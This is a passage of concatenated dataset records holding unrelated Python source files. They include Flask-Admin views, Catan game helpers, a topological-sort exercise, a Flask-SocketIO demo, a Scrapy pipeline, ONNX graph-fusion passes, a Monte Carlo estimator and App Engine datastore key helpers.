'xls']\n form_choices = {\n 'type': AVAILABLE_USER_TYPES,\n }\n form_widget_args = {\n 'id': {\n 'readonly': True\n }\n }\n column_list = [\n 'activated',\n 'type',\n 'bundle',\n 'company_name',\n 'email',\n 'phone_number',\n ]\n column_searchable_list = [\n 'company_name',\n 'email', \n ]\n column_editable_list = [\n 'type', \n 'bundle', \n 'activated'\n ]\n column_details_list = [\n 'id',\n 'activated',\n 'type',\n 'bundle',\n 'company_name',\n 'first_name',\n 'last_name',\n 'email',\n 'phone_number', \n 'street',\n 'postcode',\n 'city',\n 'country',\n 'siren',\n 'password'\n\n ]\n form_columns = [\n 'id',\n 'type',\n 'last_name',\n 'first_name',\n 'email',\n 'company_name',\n 'street',\n 'postcode',\n 'city',\n 'country',\n 'siren', \n 'phone_number',\n 'bundle',\n 'activated',\n 'password'\n ]\n form_create_rules = [\n 'type',\n 'last_name',\n 'first_name',\n 'email',\n 'company_name',\n 'street',\n 'postcode',\n 'city',\n 'country',\n 'siren', \n 'phone_number',\n 'bundle',\n 'activated',\n 'password'\n ]\n\n column_auto_select_related = True\n column_default_sort = [('type', False), ('company_name', False)] # sort on multiple columns\n\n # custom filter: each filter in the list is a filter operation (equals, not equals, etc)\n # filters with the same name will appear as operations under the same filter\n column_filters = [\n 'type',\n 'last_name',\n 'first_name',\n 'email',\n 'company_name',\n 'street',\n 'postcode',\n 'city',\n 'country',\n 'siren', \n 'phone_number',\n 'bundle',\n 'activated',\n ]\n\n form_extra_fields = {\n 'password': CustomPasswordField('Password')\n }\n \n\nclass FileCRUD(ModelView):\n \n def _date_format(view, value):\n return value.strftime('%B %Y')\n\n def _json_formatter(view, context, model, name):\n \"\"\"Format model.doc as it is extracted in route posts.table in order to\n give realistic reprensentation of the client side\"\"\"\n value = getattr(model, name)\n df = pd.json_normalize(value)\n # split tables into different tabs\n list_tables = list(df['table_name'].drop_duplicates())\n items = {}\n for table_name in list_tables: \n frame = df.loc[df['table_name'] == table_name]\n # dict table_name as key, tuple (id, rendered html tables)\n items.update( {table_name: ( uuid.uuid4(), utils.table(frame).financials() )} )\n return Markup(render_template('admin/details.html', items=items))\n\n def on_model_change(self, form, model, is_created=False):\n file = request.get_array(field_name='doc')\n df = pd.DataFrame(file)\n # convert first row to column header\n df = df.rename(columns=df.iloc[0]).drop(df.index[0])\n df = df.apply( pd.to_numeric, errors='ignore')\n # load to db\n model.doc = json.loads(df.to_json(orient='records', date_format='iso'))\n\n\n list_template = 'admin/my_files.html' \n MY_DEFAULT_FORMATTERS = dict(typefmt.BASE_FORMATTERS)\n MY_DEFAULT_FORMATTERS.update({\n date: _date_format \n }) \n column_type_formatters = MY_DEFAULT_FORMATTERS\n form_args = dict(\n time = dict(validators=[DataRequired()],format='%B %Y')\n )\n form_widget_args = dict(\n time={'data-date-format': u'%B %Y'} \n )\n page_size = 100\n can_set_page_size = True\n can_view_details = True\n can_edit = False\n column_list = [\n 'user', \n 'name', \n 'date', \n ]\n column_details_list = [\n 'id',\n 'user',\n 'name',\n 'date',\n 'doc' \n ]\n form_columns = [\n 'user', \n 'name',\n 'date',\n 'doc',\n ]\n column_default_sort = [\n ('user.company_name', False), \n ('user.email', False), \n ('date', True)\n ]\n can_export = True\n export_types = ['csv', 'xls']\n column_sortable_list = [\n ('user', ('user.company_name', 'user.email')), # sort on multiple columns\n 'name', \n 'date',\n ]\n column_searchable_list = [\n 'user.company_name',\n 'user.email',\n 'name',\n 'date'\n ]\n column_filters = [\n 'user.company_name',\n 'user.email',\n 'name', \n 'date',\n ]\n column_formatters = {\n 'doc': _json_formatter,\n } \n form_overrides = {\n 'doc': FileUploadField\n }\n # Pass additional parameters to 'path' to FileUploadField constructor\n form_args = {\n 'doc': {\n 'label': 'Doc',\n 'base_path': file_path,\n 'allow_overwrite': True\n }\n }","repo_name":"ActurialCapital/kashtable","sub_path":"KashTable/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31333354339","text":"from random import randrange\nfrom math import sqrt\n\n#valeur absolue\ndef abs (x):\n if x<0:\n return -x\n else: \n return x\n\n#Retourne faux s'il existe dans sommets un sommets quasiment identique à sommet\ndef not_in_keys_sommet(sommet, sommets):\n for i in sommets.keys():\n if abs(sommet[0]-i[0]) < 10 and abs(sommet[1]-i[1]) < 10:\n return False\n return True\n\ndef not_in_keys_route(route, routes):\n\tfor i in routes.keys():\n\t\tif (abs(route[0][0]-i[0][0]) < 10 and abs(route[0][1]-i[0][1]) < 10 and abs(route[1][0]-i[1][0]) < 10 and abs(route[1][1]-i[1][1]) < 10) or (abs(route[1][0]-i[0][0]) < 10 and abs(route[1][1]-i[0][1]) < 10 and abs(route[0][0]-i[1][0]) < 10 and abs(route[0][1]-i[1][1]) < 10):\n\t\t\treturn False\n\treturn True\n\n\ndef Roll_dices():\n dice1=randrange(1,7)\n dice2=randrange(1,7)\n return dice1+dice2\n\n\ndef placer_colonie(Plateau, coord):\n Plateau.Sommets[coord].batiment='Colonie'\n Plateau.Sommets[coord].Joueur=Plateau.Joueur_en_cours\n if Plateau.Premier_Tour==False:\n Plateau.Joueur_en_cours.Bois-=1\n Plateau.Joueur_en_cours.Blé-=1\n Plateau.Joueur_en_cours.Argile-=1\n Plateau.Joueur_en_cours.Monton-=1\n\n\ndef placer_ville(Plateau, coord):\n Plateau.Sommets[coord].batiment='Ville'\n Plateau.Sommets[coord].Joueur=Plateau.Joueur_en_cours\n if Plateau.Premier_Tour==False:\n Plateau.Joueur_en_cours.Blé-=2\n Plateau.Joueur_en_cours.Roche-=3\n \ndef placer_route(Plateau, coord):\n Plateau.Routes[coord].Joueur=Plateau.Joueur_en_cours\n if Plateau.Premier_Tour==False:\n Plateau.Joueur_en_cours.Bois-=1\n Plateau.Joueur_en_cours.Argile-=1\n\n\ndef fct_Premier_Tour(Plateau):\n dices_results={}\n for i in range(Plateau.Nbrjoueur):\n #attendre lancer de dé joueur \n lancer=Roll_dices()\n while lancer in dices_results.keys():\n lancer=Roll_dices()\n dices_results[lancer]=Plateau.Joueurs[i]\n\n print (dices_results)\n sorted_results=sorted(dices_results,reverse=True)+sorted(dices_results)\n print (sorted_results)\n\n ordre=[]\n for result in sorted_results:\n cpt=0\n for cle in dices_results.keys():\n if cle==result:\n if cpt==0:\n ordre+=[dices_results[cle]]\n cpt=1\n print (ordre)\n #Plateau.can.create_text(200,200,text='salut')\n\n \n for player in ordre:\n Plateau.can.bind(\"<Button>\", lambda event : trouver_sommet(event, Plateau))\n\n \n\n\n\n\ndef get_Nbjoueur(NbJoueur):\n Nb_Joueur=NbJoueur.get()\n print (Nb_Joueur)\n return\n\n\n\n\n\n\n\ndef trouver_case (self, event):\n x, y = event.x, event.y\n for hex in self.hexagons:\n if hex.sommet_1[0]<x<hex.sommet_2[0] and hex.sommet_1[1]<y<hex.sommet_5[1]:\n print(hex.coords)\n return hex.coords\n\n\n\n\ndef trouver_sommet (event,Plateau):\n x, y = event.x, event.y\n size = (1/2) * 85 * sqrt(3) / 2\n for sommet in Plateau.sommets:\n if sommet[0]-size < x < sommet[0]+size and sommet[1]-size < y < sommet[1]+size:\n print (sommet)\n return sommet\n\n\n\n \n","repo_name":"guillaumegut/Catan","sub_path":"Fonctions.py","file_name":"Fonctions.py","file_ext":"py","file_size_in_byte":3147,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19868380747","text":"import sys\ninput = lambda : sys.stdin.readline().rstrip('\\r\\n')\nimport heapq\n\nN, M = map(int, input().split())\ncnt = [0] * (N+1)\narr = [[] for _ in range(N+1)]\nqueue = []\nfor _ in range(M): #먼저푸는게 좋은 문제 정보\n first, second = map(int, input().split())\n arr[first].append(second)\n cnt[second] +=1\n\nfor i in range(1,N+1):\n if cnt[i] == 0:\n heapq.heappush(queue,i)\n\nwhile queue:\n problem = heapq.heappop(queue)\n print(problem, end=' ')\n for i in arr[problem]:\n if cnt[i] > 0:\n cnt[i] -= 1\n if cnt[i] == 0:\n heapq.heappush(queue,i)\n\n\n\n\n","repo_name":"cocorig/challenge100-codingtest-study","sub_path":"wlwl1011/BOJ/heybob/2회/1766.py","file_name":"1766.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"30413452","text":"from flask import Flask, render_template\nfrom flask_socketio import SocketIO, emit\nimport random\nimport time\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!' # Feel free to change it to any more strong secrets as per requirement\nsocketio = SocketIO(app)\n\n@app.route('/')\ndef index():\n \"\"\"\n - For explanation purposes, I have done random number generation\n - Generates the updated random number after every 3 seconds\n - Random number range will be between 1 to 100 at this time, can be changed accordingly\n - More real-time scenarios can be possible, but this was a basic example to get started\n - Socket connections are used to maintain the state of the APIs\n \"\"\"\n return render_template('index.html')\n\ndef update_data():\n while True:\n time.sleep(3) # Update data every 3 seconds\n data = {'value': random.randint(1, 100)}\n socketio.emit('update', data, namespace='/test')\n\n@socketio.on('connect', namespace='/test')\ndef handle_connect():\n print('Client connected')\n\n@socketio.on('disconnect', namespace='/test')\ndef handle_disconnect():\n print('Client disconnected')\n\nif __name__ == '__main__':\n socketio.start_background_task(target=update_data)\n socketio.run(app, debug=True)\n","repo_name":"soubarno77/flask_projects","sub_path":"Flask_Assignment12/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37937974232","text":"from ...core import Graph\nfrom ...core import Node\nfrom ...core.match_utils import ConstantMatcher, OpMatcher, AnyAttrValue, make_pattern\nfrom ...passes import Pass\nfrom ...ops import Op\nimport math\n\n\nclass ExtractGemm(Pass):\n \"\"\"\n input weight\n | |\n \\ [Transpose(1, 0)]\n \\ /\n [MatMul]\n |\n output\n\n or\n\n input weight\n | |\n \\ [Transpose(1, 0)]\n \\ /\n [MatMul]\n | bias\n | /\n [Add]\n |\n output\n\n \"\"\"\n\n def __init__(self):\n from onnx.helper import make_attribute\n\n trans = Node.make_node(\n \"tr\", \"Transpose\", [\"0\"], [\"1\"], [make_attribute(\"perm\", [1, 0])]\n )\n matmul = Node.make_node(\"matmul\", \"MatMul\", [\"2\", \"1\"], [\"3\"])\n self.pattern = Graph.make_graph(\n \"fc module\", {}, [trans, matmul], [\"0\", \"2\"], [\"3\"]\n )\n self.pattern.update_topology()\n\n biased_trans = Node.make_node(\n \"tr\", \"Transpose\", [\"0\"], [\"1\"], [make_attribute(\"perm\", [1, 0])]\n )\n biased_matmul = Node.make_node(\"matmul\", \"MatMul\", [\"2\", \"1\"], [\"3\"])\n bias = Node.make_node(\"add\", \"Add\", [\"3\", \"4\"], [\"5\"])\n self.biased_pattern = Graph.make_graph(\n \"fc module\", {}, [trans, matmul, bias], [\"0\", \"2\", \"4\"], [\"5\"]\n )\n self.biased_pattern.update_topology()\n\n nodes = [\n ConstantMatcher(\"weight\"),\n Op.make_op(\"MatMul\", \"matmul\", [\"0\", \"weight\"], [\"2\"]),\n ConstantMatcher(\"bias\"),\n Op.make_op(\"Add\", \"add\", [\"2\", \"bias\"], [\"4\"]),\n ]\n self.biased_xxpattern = make_pattern(nodes, [\"0\"], [\"4\"])\n\n nodes = [\n ConstantMatcher(\"weight\"),\n Op.make_op(\"MatMul\", \"matmul\", [\"0\", \"weight\"], [\"2\"]),\n ]\n self.xxpattern = make_pattern(nodes, [\"0\"], [\"2\"])\n\n def run(self, graph):\n from onnx.helper import make_attribute\n\n def make_gemm(r):\n inp = r[\"matmul\"].input[0]\n if \"tr\" in r:\n # has weight transpose, so w is the input of transpose,\n # since it will be used as input of Gemm.\n w = r[\"tr\"].input[0]\n transpose_b = 1\n else:\n w = r[\"matmul\"].input[1]\n transpose_b = 0\n if \"add\" in r:\n # has bias add\n out = r[\"add\"].output[0]\n b = r[\"add\"].input[1]\n else:\n out = r[\"matmul\"].output[0]\n b = None\n lsp = graph.get_tensor_shape(inp)\n # rsp is the shape of second input into matmul\n rsp = graph.get_tensor_shape(r[\"matmul\"].input[1])\n res = []\n\n # computation should be (.., k) * (k, n) -> (.., n)\n if len(rsp) != 2 or lsp[-1] != rsp[0]:\n return None\n\n if len(lsp) != 2:\n reshape_name = r[\"matmul\"].name + \"::reshape0\"\n reshape_out = r[\"matmul\"].name + \"_reshape_out\"\n reshape = Op.make_op(\n \"Reshape\",\n reshape_name,\n [inp],\n [reshape_out],\n {\"shape\": make_attribute(\"shape\", [-1, rsp[0]])},\n )\n inp = reshape_out\n res.append(reshape)\n\n gemm_out = out + \"_reshape_out\"\n\n inputs = [inp, w, b] if b else [inp, w]\n gemm = Op.make_op(\n \"Gemm\",\n r[\"matmul\"].name,\n inputs,\n [gemm_out],\n {\"transB\": transpose_b},\n )\n res.append(gemm)\n\n reshape_name = r[\"matmul\"].name + \"::reshape1\"\n out_sp = graph.get_tensor_shape(out)\n reshape = Op.make_op(\n \"Reshape\",\n reshape_name,\n [gemm_out],\n [out],\n {\"shape\": make_attribute(\"shape\", [-1] + out_sp[1:])},\n )\n res.append(reshape)\n else:\n inputs = [inp, w, b] if b else [inp, w]\n gemm = Op.make_op(\n \"Gemm\", r[\"matmul\"].name, inputs, [out], {\"transB\": transpose_b}\n )\n res.append(gemm)\n return res\n\n for r in graph.match(self.biased_pattern):\n res = make_gemm(r)\n if not res:\n continue\n\n graph.insert_nodes(res, graph.nodes.index(r[\"tr\"]))\n [graph.del_node_purely(r[n]) for n in r]\n graph.update_topology()\n graph.update_tensor_shape()\n\n for r in graph.match(self.pattern):\n res = make_gemm(r)\n if not res:\n continue\n\n graph.insert_nodes(res, graph.nodes.index(r[\"tr\"]))\n [graph.del_node_purely(n) for n in r.values()]\n graph.update_topology()\n graph.update_tensor_shape()\n\n for r in graph.match(self.biased_xxpattern):\n res = make_gemm(r)\n if not res:\n continue\n\n graph.insert_nodes(res, graph.nodes.index(r[\"matmul\"]))\n [graph.del_node_purely(n) for n in r.values()]\n graph.update_topology()\n graph.update_tensor_shape()\n\n for r in graph.match(self.xxpattern):\n res = make_gemm(r)\n if not res:\n continue\n\n graph.insert_nodes(res, graph.nodes.index(r[\"matmul\"]))\n [graph.del_node_purely(n) for n in r.values()]\n graph.update_topology()\n graph.update_tensor_shape()\n\n for n in list(graph.nodes):\n if n.op_type == \"MatMul\":\n lsp = graph.get_tensor_shape(n.input[0])\n rsp = graph.get_tensor_shape(n.input[1])\n if not (len(lsp) == 2 and len(rsp) == 2):\n continue\n gemm = Op.make_op(\"Gemm\", n.name, n.input, n.output)\n graph.insert_nodes([gemm], graph.nodes.index(n))\n graph.del_node_purely(n)\n graph.update_topology()\n graph.update_tensor_shape()\n\n\nfrom ...core.match_utils import ConstantMatcher\n\n\nclass ExtractHswish(Pass):\n \"\"\"This pass find and convert Hswish constructure, which looks like\n input [Constant(3)]\n | /\n / \\ /\n | [Add]\n | |\n | [Clip(min=0, max=6)]\n \\ /\n [Mul] [Constant(6)]\n \\ /\n [Div]\n |\n output\n \"\"\"\n\n def __init__(self):\n import numpy as np\n from onnx import numpy_helper\n from onnx.helper import make_attribute\n\n cons3 = ConstantMatcher(\"cons3\", value=np.array(3).astype(\"float32\"))\n addn = Node.make_node(\"addn\", \"Add\", [\"0\", \"cons3\"], [\"2\"])\n clipn = Node.make_node(\n \"clipn\",\n \"Clip\",\n [\"2\"],\n [\"3\"],\n [make_attribute(\"min\", 0.0), make_attribute(\"max\", 6.0)],\n )\n muln = Node.make_node(\"muln\", \"Mul\", [\"0\", \"3\"], [\"4\"])\n cons6 = ConstantMatcher(\"cons6\", value=np.array(6).astype(\"float32\"))\n divn = Node.make_node(\"divn\", \"Div\", [\"4\", \"cons6\"], [\"6\"])\n\n self.pattern = Graph.make_graph(\n \"hswish module\", {}, [cons3, addn, clipn, muln, cons6, divn], [\"0\"], [\"6\"]\n )\n self.pattern.update_topology()\n\n def run(self, graph):\n for r in graph.match(self.pattern):\n for n in r.values():\n if n.op_type == \"Add\":\n op_name = n.name\n inp = n.input[0]\n if n.op_type == \"Div\":\n out = n.output[0]\n hswish = Op.from_onnx_node(\n Node.make_node(op_name, \"Hswish\", [inp], [out]).dump_to_onnx()\n )\n graph.insert_nodes([hswish], graph.nodes.index(r[\"cons3\"]))\n [graph.del_node_purely(n) for n in r.values()]\n graph.update_topology()\n graph.update_tensor_shape()\n\n\nclass ExtractHsigmoid(Pass):\n \"\"\"This pass find and convert Hsigmoid constructure, which looks like\n input [Constant(3)]\n | /\n \\ /\n [Add]\n |\n [Clip(min=0, max=6)]\n | [Constant(6)]\n \\ /\n [Div]\n |\n output\n \"\"\"\n\n def __init__(self):\n import numpy as np\n from onnx import numpy_helper\n from onnx.helper import make_attribute\n\n cons3 = ConstantMatcher(\"cons3\", value=np.array(3).astype(\"float32\"))\n addn = Node.make_node(\"addn\", \"Add\", [\"0\", \"cons3\"], [\"2\"])\n clipn = Node.make_node(\n \"clipn\",\n \"Clip\",\n [\"2\"],\n [\"3\"],\n [make_attribute(\"min\", 0.0), make_attribute(\"max\", 6.0)],\n )\n cons6 = ConstantMatcher(\"cons6\", value=np.array(6).astype(\"float32\"))\n divn = Node.make_node(\"divn\", \"Div\", [\"3\", \"cons6\"], [\"6\"])\n\n self.pattern = Graph.make_graph(\n \"hsigmoid module\", {}, [cons3, addn, clipn, cons6, divn], [\"0\"], [\"6\"]\n )\n self.pattern.update_topology()\n\n def run(self, graph):\n from onnx.helper import make_attribute\n\n for r in graph.match(self.pattern):\n for n in r.values():\n if n.op_type == \"Add\":\n op_name = n.name\n inp = n.input[0]\n if n.op_type == \"Div\":\n out = n.output[0]\n hsigmoid = Op.from_onnx_node(\n Node.make_node(\n op_name,\n \"Hsigmoid\",\n [inp],\n [out],\n [make_attribute(\"alpha\", 1 / 6.0), make_attribute(\"beta\", 0.5)],\n ).dump_to_onnx()\n )\n graph.insert_nodes([hsigmoid], graph.nodes.index(r[\"cons3\"]))\n [graph.del_node_purely(n) for n in r.values()]\n graph.update_topology()\n graph.update_tensor_shape()\n\n\nclass EliminateReshapeNode:\n \"\"\"Eliminate specific *Reshape* node which alters initializer/constant's shape. It can help succesor node acquire weights directly.\"\"\"\n\n def run(self, graph):\n candidate_node = [\"Reshape\", \"Squeeze\", \"Unsqueeze\"]\n for n in graph.nodes:\n if n.op_type in candidate_node:\n inp = n.input[0]\n prod = graph.get_tensor_producer(inp)\n if inp not in graph.initializer or (\n isinstance(prod[0], Node) and prod[0].op_type != \"Constant\"\n ):\n # target tensor is input or activation\n continue\n\n if len(graph.get_tensor_consumer(inp)) != 1:\n # if inp is referenced by multi nodes, we can not do resize directly.\n continue\n\n if inp in graph.initializer:\n # initializer\n graph.initializer[inp].dims[:] = graph.get_tensor_shape(n.output[0])\n elif isinstance(prod[0], Node) and prod[0].op_type == \"Constant\":\n # constant\n prod[0].attributes[\"value\"].t.dims[:] = graph.get_tensor_shape(\n n.output[0]\n )\n\n for o in graph.get_tensor_consumer(n.output[0]):\n # replace input\n if isinstance(o, Node):\n o.replace_input_purely(n.output[0], inp)\n graph.del_node_purely(n)\n graph.update_topology()\n\n\nclass ExtractGeLU(Pass):\n \"\"\"This pass find and convert GeLU constructure, which looks like\n input [Constant(3)]\n | /\n / \\ /\n | [Add]\n | |\n | [Clip(min=0, max=6)]\n \\ /\n [Mul] [Constant(6)]\n \\ /\n [Div]\n |\n output\n \"\"\"\n\n def __init__(self):\n import numpy as np\n from onnx import numpy_helper\n from onnx.helper import make_attribute\n\n cons3 = ConstantMatcher(\"cons3\", value=np.array(3).astype(\"float32\"))\n pown = Node.make_node(\"pown\", \"Pow\", [\"0\", \"cons3\"], [\"2\"])\n cons_0_044715 = ConstantMatcher(\n \"cons_0_044715\", value=np.array(0.044715).astype(\"float32\")\n )\n mul0 = Node.make_node(\"mul0\", \"Mul\", [\"2\", \"cons_0_044715\"], [\"4\"])\n add0 = Node.make_node(\"add0\", \"Add\", [\"0\", \"4\"], [\"5\"])\n cons_rec_pi = ConstantMatcher(\n \"cons_rec_pi\", value=np.array(math.sqrt(2.0 / math.pi)).astype(\"float32\")\n )\n mul1 = Node.make_node(\"mul1\", \"Mul\", [\"5\", \"cons_rec_pi\"], [\"7\"])\n tanh = Node.make_node(\"tanh\", \"Tanh\", [\"7\"], [\"8\"])\n cons1 = ConstantMatcher(\"cons1\", value=np.array(1).astype(\"float32\"))\n add1 = Node.make_node(\"add1\", \"Add\", [\"8\", \"cons1\"], [\"10\"])\n cons_0_5 = ConstantMatcher(\"cons_0_5\", value=np.array(0.5).astype(\"float32\"))\n mul2 = Node.make_node(\"mul2\", \"Mul\", [\"0\", \"cons_0_5\"], [\"12\"])\n mul3 = Node.make_node(\"mul3\", \"Mul\", [\"12\", \"10\"], [\"13\"])\n\n self.pattern = Graph.make_graph(\n \"gelu module\",\n {},\n [\n cons3,\n pown,\n cons_0_044715,\n mul0,\n add0,\n cons_rec_pi,\n mul1,\n tanh,\n cons1,\n add1,\n cons_0_5,\n mul2,\n mul3,\n ],\n [\"0\"],\n [\"13\"],\n )\n self.pattern.update_topology()\n\n def run(self, graph):\n for r in graph.match(self.pattern):\n inp = r[\"pown\"].input[0]\n out = r[\"mul3\"].output[0]\n op_name = r[\"pown\"].name\n\n gelu = Op.from_onnx_node(\n Node.make_node(op_name, \"GeLU\", [inp], [out]).dump_to_onnx()\n )\n graph.insert_nodes([gelu], graph.nodes.index(r[\"pown\"]))\n [graph.del_node_purely(n) for n in r.values()]\n graph.update_topology()\n graph.update_tensor_shape()\n\n\nclass ExtractLayerNorm(Pass):\n \"\"\"This pass find and convert LayerNorm constructure, which looks like\"\"\"\n\n def __init__(self):\n import numpy as np\n from onnx import numpy_helper\n from onnx.helper import make_attribute\n\n reduce_0 = Node.make_node(\n \"reduce_0\", \"ReduceMean\", [\"0\"], [\"1\"], [make_attribute(\"axes\", [-1])]\n )\n sub_0 = Node.make_node(\"sub_0\", \"Sub\", [\"0\", \"1\"], [\"2\"])\n cons_2 = ConstantMatcher(\"cons_2\", value=np.array(2).astype(\"float32\"))\n pow_0 = Node.make_node(\"pow_0\", \"Pow\", [\"2\", \"cons_2\"], [\"4\"])\n reduce_1 = Node.make_node(\n \"reduce_1\", \"ReduceMean\", [\"4\"], [\"5\"], [make_attribute(\"axes\", [-1])]\n )\n cons_eps = ConstantMatcher(\"cons_eps\", pshape=[1], tolerant_shape=True)\n add_0 = Node.make_node(\"add_0\", \"Add\", [\"5\", \"cons_eps\"], [\"7\"])\n sqrt_0 = Node.make_node(\"sqrt_0\", \"Sqrt\", [\"7\"], [\"8\"])\n div_0 = Node.make_node(\"div_0\", \"Div\", [\"2\", \"8\"], [\"9\"])\n cons_w = ConstantMatcher(\"cons_w\")\n mul_0 = Node.make_node(\"mul_0\", \"Mul\", [\"9\", \"cons_w\"], [\"11\"])\n cons_b = ConstantMatcher(\"cons_b\")\n add_1 = Node.make_node(\"add_1\", \"Add\", [\"11\", \"cons_b\"], [\"13\"])\n\n self.pattern = Graph.make_graph(\n \"layernorm module\",\n {},\n [\n reduce_0,\n sub_0,\n cons_2,\n pow_0,\n reduce_1,\n cons_eps,\n add_0,\n sqrt_0,\n div_0,\n cons_w,\n mul_0,\n cons_b,\n add_1,\n ],\n [\"0\"],\n [\"13\"],\n )\n self.pattern.update_topology()\n\n def run(self, graph):\n for r in graph.match(self.pattern):\n inp = r[\"reduce_0\"].input[0]\n out = r[\"add_1\"].output[0]\n op_name = r[\"reduce_0\"].name\n w = r[\"mul_0\"].input[1]\n b = r[\"add_1\"].input[1]\n\n layernorm = Op.from_onnx_node(\n Node.make_node(op_name, \"LayerNorm\", [inp, w, b], [out]).dump_to_onnx()\n )\n graph.insert_nodes([layernorm], graph.nodes.index(r[\"reduce_0\"]))\n [graph.del_node_purely(n) for n in r.values()]\n graph.update_topology()\n graph.update_tensor_shape()\n","repo_name":"ModelTC/NART","sub_path":"python/nart/utils/passes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16585,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"21"} +{"seq_id":"16028343964","text":"#백트래킹 4번, 실버3\n\nn ,m = map(int, input().split())\n\nanswer = []\n\ndef dfs(depth):\n if len(answer) == m:\n print(\" \".join(map(str, answer)))\n return\n for i in range(depth, n+1):\n answer.append(i)\n dfs(i)\n answer.pop()\n\ndfs(1)","repo_name":"lookinmin/algorithm_study","sub_path":"week6/bakjoon_15652.py","file_name":"bakjoon_15652.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25193087798","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport json\n\n\nclass Dimensions(object):\n def process_item(self, item, spider):\n\n json_dimensions = {}\n\n if item.get(\"dimensions\"):\n try:\n leng = float((''.join(item[\"dimensions\"][0]).split(\" \"))[0])\n json_dimensions['length'] = leng\n except:\n return item\n\n try:\n wid = float((''.join(item[\"dimensions\"][0]).split(\" \"))[2])\n json_dimensions['width'] = wid\n except:\n return item\n\n try:\n hei = float((''.join(item[\"dimensions\"][0]).split(\" \"))[4])\n json_dimensions['height'] = hei\n except:\n return item\n\n try:\n wei = float((''.join(item[\"dimensions\"][1]).split(\" \", 1))[0])\n json_dimensions['weight'] = wei\n except:\n return item\n\n json_dimensions = json.dumps(json_dimensions)\n item[\"dimensions\"] = json_dimensions\n else:\n return item\n\n return item","repo_name":"metaroot/amazonScrape","sub_path":"scrapeAmazon/pipelines/dimensions.py","file_name":"dimensions.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16858994267","text":"\"\"\"\"\"\"\r\n\r\nimport random\r\nfrom math import sqrt\r\n\r\ndef estimate_area(func, xlo, xhi, ylo, yhi, n=100):\r\n \"\"\"\r\n Estimates arbitrary 2D area defined by a function\r\n\r\n Parameters\r\n ----------\r\n func : function\r\n Function of x and y\r\n xlo : float\r\n Minimum x value of region\r\n xhi : float\r\n Maximum x value of region\r\n ylo : float\r\n Minimum y value of region\r\n yhi : float\r\n Maximum y value of region\r\n n : int, optional\r\n Number of iterations. The default is 100.\r\n\r\n Raises\r\n ------\r\n ValueError\r\n\r\n Returns\r\n -------\r\n area : float\r\n estimated area in region\r\n\r\n \"\"\"\r\n \r\n if (n <= 0):\r\n raise ValueError(\"n must be greater than zero\")\r\n if (xlo >= xhi or ylo >= yhi):\r\n raise ValueError\r\n \r\n total_A = (xhi-xlo)*(yhi-ylo)\r\n pts = pts_in = 0\r\n for i in range(0, n):\r\n x = (xhi+xlo)*random.random() - xlo\r\n y = (yhi+ylo)*random.random() - ylo\r\n \r\n if (func(x,y) < 0.0):\r\n pts_in += 1\r\n \r\n pts += 1\r\n \r\n area = (float(pts_in)/float(pts)) * total_A\r\n return area\r\n\r\ndef mc_integral(func, a, b, n):\r\n \"\"\"\r\n Estimates the integral of a given function using monte carlo\r\n\r\n Parameters\r\n ----------\r\n func : function\r\n returns a y value given x\r\n a : float\r\n lower x bound\r\n b : float\r\n upper x bound\r\n n : int\r\n number of random points to use between bounds\r\n\r\n Raises\r\n ------\r\n ValueError\r\n\r\n Returns\r\n -------\r\n integral : float\r\n the estimated integral\r\n sigma : float\r\n the estimated standard deviation\r\n\r\n \"\"\"\r\n \r\n if (n <= 0):\r\n raise ValueError\r\n \r\n if (a >= b):\r\n raise ValueError\r\n \r\n ac2 = ac = 0.\r\n for i in range(0, n):\r\n x = (a+b)*random.random() - a\r\n ac += func(x)\r\n ac2 += func(x)**2\r\n \r\n ac /= n\r\n ac2 /= n\r\n \r\n integral = ac*(b-a)\r\n sigma = (b-a)*sqrt( (ac2 - ac**2)/n )\r\n \r\n return integral, sigma","repo_name":"drcnic/rpi-numpe-fall-2021","sub_path":"In-class exercises/17/monte_carlo.py","file_name":"monte_carlo.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38596884271","text":"from google.appengine.ext import ndb\n\n\n#There are 5 root keys\ndef league_key(commissioner_id):\n \"\"\"League keys are based off of the id of the person who commissions them\"\"\"\n return ndb.Key(League, commissioner_id)\n\n\ndef account_key(account_id):\n \"\"\"Constructs a Datastore key for a account entity with a user id.\"\"\"\n return ndb.Key(Account, str(account_id))\n\n\ndef team_key(team_number):\n \"\"\"Constructs a Datastore key for a team given its number\"\"\"\n return ndb.Key('Team', team_number)\n\n\ndef root_event_key(event_id):\n \"\"\"Constructs the Datastore key for an event given its event_id\"\"\"\n return ndb.Key(RootEvent, event_id)\n\n\ndef root_team_key(team_number):\n \"\"\"Constructs the Datastore key for a root team given its number\"\"\"\n return ndb.Key(RootTeam, team_number)\n\n\n#Every other key is based off of the root keys\ndef team_event_key(team_key_val, event_id):\n \"\"\"Constructs a Datastore key for a team_event entity with a team_key as parent and event_id as id\"\"\"\n return ndb.Key(TeamEvent, event_id, parent=team_key_val)\n\n\ndef choice_key(player_key, league_id):\n \"\"\"Constructs a Datastore key for a Choice entity with a player_key as parent and league_id as id\"\"\"\n return ndb.Key(Choice, str(league_id), parent=player_key)\n\n\ndef lineup_key(choice_key_val, week_number):\n \"\"\"Constructs a Datastore key for a week choice entity with a choice_key as parent and week_number as id\"\"\"\n return ndb.Key(Lineup, str(week_number), 